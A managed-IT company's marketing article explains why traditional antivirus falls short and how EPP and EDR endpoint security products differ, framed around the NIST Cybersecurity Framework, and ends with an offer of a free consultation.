Cybersecurity is a complex discipline that requires ever more advanced solutions to deal with modern threats. For an organization trying to mitigate their cybersecurity risks, the situation is further complicated by the range of different solutions available. From traditional antivirus to an assortment of newer three-letter technologies like EPP and EDR, this article helps demystify the main cybersecurity defenses available to your business.
Many in the cybersecurity industry attempt to align our cybersecurity components with as many of the five NIST Cybersecurity Framework pillars as possible: Identity, Protect, Detect, Respond, and Recover. However, interpretations and marketing labels vary from vendor to vendor with the result that, just as all anti-virus solutions are not alike, the same is true for EPP and EDR.
The modern threat landscape
Today’s cyberthreat landscape is far more dynamic than it was just 10 years ago. The profitability of stealing data or infiltrating systems and demanding ransoms to unlock them means more criminals than ever are recognizing how lucrative cybercrime can be. An understanding of the value of data incentivizes criminals to pay big money for stolen information or exploits that can compromise systems. Hackers are going for larger payouts by trying to launch zero-day exploits for which the financial rewards are huge.
Furthermore, the world is more connected and the barriers to entry in cybercrime are incredibly low. Due to these reduced barriers to entry, the modern threat landscape sees hundreds of thousands of new malicious programs emerge daily. Some of this malware will inevitably be fileless or zero-day viruses undetectable by antivirus solutions, reducing the ability to respond to such threats.
The takeaway here is, an unprecedented number of bad actors are creating malicious software to bypass traditional cybersecurity defenses, and every organization should carefully and frequently evaluate their current cybersecurity protections.
Why antivirus software is no longer enough
Traditional antivirus systems attempt to protect through identification (the first NIST cybersecurity pillar), by comparing new virus signatures against databases of known threats. This used to provide adequate protection; however, attackers have become more intelligent when writing code. Modern polymorphic viruses can modify themselves so their signatures do not match anything in databases of known malware. In addition, there are multiple types of viruses with unique attack approaches which can evade traditional antivirus.
Adding behavior-based heuristic analysis to traditional antivirus has helped somewhat to combat these polymorphic viruses. Sometimes called “NextGen Antivirus”, heuristic scans statically analyze source code to identify suspicious characteristics, or they can dynamically analyze the code by running it in a virtual sandbox. A virus is flagged when the analyzed code matches the functions or behavior of a repository of known malware. But heuristic scans still rely on comparing suspect code to the properties and behavior of known viruses. Therein lies the fundamental weakness of traditional antivirus solutions: They rely on detecting known and cataloged threats.
Antivirus solutions are powerless against a zero-day virus — previously unknown malicious software that doesn’t have cataloged file signatures or identifiable methods of operation deployed by known viruses. There is also fileless malware to contend with. This type of malicious software is memory-based and piggybacks on legitimate software, so it doesn’t leave footprints detectable by signature-based or heuristic analysis.
As a standalone solution, therefore, antivirus software is no longer adequate in the modern cyberthreat landscape. And so we have a selection of newer approaches: EPP and EDR. We are going to look at both of these.
EPP: What is an endpoint protection platform?
EPP brings expanded capabilities to standard antivirus technology. You can think of EPP as augmented antivirus that has the ability to recognize more suspicious behaviors in real time and identify some kinds of compromised devices across the network. EPPs are focused on preventing the initial infection (the second NIST cybersecurity pillar), but miss other adaptive security architecture tasks such as detection and response
EPPs provide a suite of tools for defending networked devices, such as workstations, laptops, and servers, against security threats. An EPP includes technologies like antiviral signature scanning, data encryption, personal firewalls with port/device control, and intrusion prevention.
A weakness with most EPP solutions is their inherently preventative scope. They are limited in responding to threats that evade frontline defenses and enter your network environment. An EPP is much better than standard antivirus software at detecting malware, but malware and attack tools are evolving faster than EPP protection capabilities.
EDR: What is endpoint detection and response?
EDR uses artificial intelligence (AI) to create a far more powerful and comprehensive defense than antivirus/EPP can mount. Aligning the NIST Cybersecurity pillars of Detect and Respond, EDR focuses on continuous real-time monitoring and countering suspicious activities on network endpoint devices. For example, it can respond to zero-day threats through behavioral analysis, rather than known patterns, much more quickly and accurately, thanks to AI.
Another key feature is centralized management of all network endpoints and security capabilities from a single dashboard, which provides better visibility and oversight. This holistic overview of endpoint security enables different security technologies to exchange information about events and report to the end-user, which improves the overall security posture of the organization.
Some of the key distinguishing features of EDR solutions include:
- Full visibility into endpoint activity – By collecting and analyzing data from endpoints in real time and gathering the information in a central console, IT teams get full visibility into endpoint activity from a single interface.
- Proactive security – EDR is proactive because it enables IT teams to hunt out threats based on more subtle, behavioral analytics rather than comparing potential threats with databases of known file signatures or code snippets.
- Automated threat response – Rule-based responses enable IT teams to set up automated remediation actions within an EDR platform based on predefined rules.
What is the difference between EPP and EDR?
Traditionally, EPP (endpoint protection platform) and EDR (endpoint detection and response) were two separate security solutions, together designed to cover the first three pillars of the NIST Cybersecurity Framework: Protect, Detect, and Respond. Today, vendors are merging EPP and EDR product functions but unfortunately, the labels can be confusing.
For example, Microsoft’s newest EPP+EDR is called Defender Endpoint Protection. SentinelOne now offers its Endpoint Security Platform. Cylance’s flagship is still EPP, however it also has very good EDR functionality. Carbon Black uses the EDR label, but their offering includes “next-generation antivirus protections”.
All of the above solutions are amalgamations of EPP and EDR functionality. Labels aside, today’s EPP/EDR products are vastly more powerful and effective than traditional antivirus (or even last year’s EPP). A completed endpoint protection solution will include the capabilities of antivirus, EPP, and EDR, and together provide the ability to protect your endpoints, detect anomalies that slip through your defenses, and enable you to respond with the information needed to investigate and react.
Standard antivirus software should be considered obsolete in today’s cybersecurity threat environment. EPP and EDR are now overlapping terms and these tools are merging into holistic endpoint security solutions. Increasingly, detection and response capabilities are being integrated into endpoint protection systems. Advanced EPP / EDR solutions incorporate tools that detect known and unknown malware, provide real-time automated response capabilities, and add visibility into the causes and the impact of cyber attacks.
Need a partner to help you navigate today’s cybersecurity landscape? Umbrella Managed Systems can help you with modern cybersecurity challenges. To find out more, contact us today for a free consultation.